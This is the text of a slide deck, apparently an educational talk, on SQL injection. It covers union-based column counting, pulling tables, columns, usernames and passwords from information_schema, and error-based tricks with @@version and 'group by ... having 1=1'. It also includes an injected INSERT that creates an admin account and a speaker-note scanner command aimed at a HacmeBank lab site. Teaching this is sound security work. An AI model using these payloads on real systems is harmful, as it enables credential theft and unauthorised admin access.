  • 32. The Strategy 3. Get the Structure of the database SELECT …,…,…,…,… FROM …. WHERE …. UNION SELECT ….,TableNames,….,….,… FROM DatabaseStructure --=…. AND ….!=….. OR …..>……
  • 33. The Strategy 4. Get the data from the database SELECT …,…,…,…,… FROM …. WHERE …. UNION SELECT ….,Usernames,….,….,… FROM Users --=…. AND ….!=….. OR …..>……
  • 34. The Strategy Get number of items after the SELECT statement Identify the location of the STRINGS in the SELECT Statement 3. Get the Structure of the database 4. Get the data from the database
  • 35. 1. Get number of items after the SELECT statement
  • 36. Error
  • 38. Result Why the results are less?
  • 42. Result How many columns do we have in the SELECT statement
  • 43. The Strategy Get number of items after the SELECT statement Identify the location of the STRINGS in the SELECT Statement 3. Get the Structure of the database 4. Get the data from the database
  • 44. 2. Identify the location of the STRINGS in the SELECT Statement 1234') UNION SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL#
  • 46. Get the Strings and the locations 1234') UNION SELECT NULL,'ABC','DEF','IJK','LMN',NULL,NULL#
  • 48. The Strategy Get number of items after the SELECT statement Identify the location of the STRINGS in the SELECT Statement 3. Get the Structure of the database 4. Get the data from the database
  • 49. 3. Get the Structure of the database 1234') UNION SELECTNULL,NULL,NULL,table_name,NULL,NULL,NULLFROMinformation_schema.tables#
  • 51. The Strategy Get number of items after the SELECT statement Identify the location of the STRINGS in the SELECT Statement 3. Get the Structure of the database 4. Get the data from the database
  • 52. Next Queries 1234') UNION SELECT NULL,NULL,NULL,column_name,NULL,NULL,NULLFROMinformation_schema.columns where table_name=‘USERS'# 1234') UNION SELECT NULL,NULL,NULL,username,password,null,null FROM users WHERE id<100# ……. Continue till you get all the tables
  • 53. The Strategy Get number of items after the SELECT statement Identify the location of the STRINGS in the SELECT Statement 3. Get the Structure of the database 4. Get the data from the database
  • 54. Injection with errors
  • 55. Gives me an Error
  • 56. Getting version ' and 1 in (SELECT @@version)--
  • 57. Gives me this error
  • 59. I get this Error
  • 60. Getting next column name ' group by login.firstname having 1=1--
  • 61. I get this error
  • 62. Again ' group by login.firstname, login.surname having 1=1--
  • 63. Error reveals new column name
  • 64. Again ' group by login.firstname, login.surname,login.username having 1=1--
  • 68. Continue… After getting all of the columns I found a field called IsAdmin-that’s my goal - Putting the following query creates an admin account on the application ‘; INSERT INTO Login (username,pwd,IsAdmin,……) VALUES (‘Administrator’,’******’,TRUE,…..)
  • 69. Not all Injections generate errors
  • 71. You Were GREAT Audience
  • 72. Thank You @mostafasiraj Mostafa Siraj

Notas do Editor

  1. -u &quot;http://rajpc/HacmeBank_v2_Website/aspx/Main.aspx?function=TransactionDetails&amp;account_no=5204320422040001&quot; --cookie &quot;ASP.NET_SessionId=fadqryjsmlb52y45hztq0pvc; CookieLoginAttempts=5; Admin=false&quot; -p account_no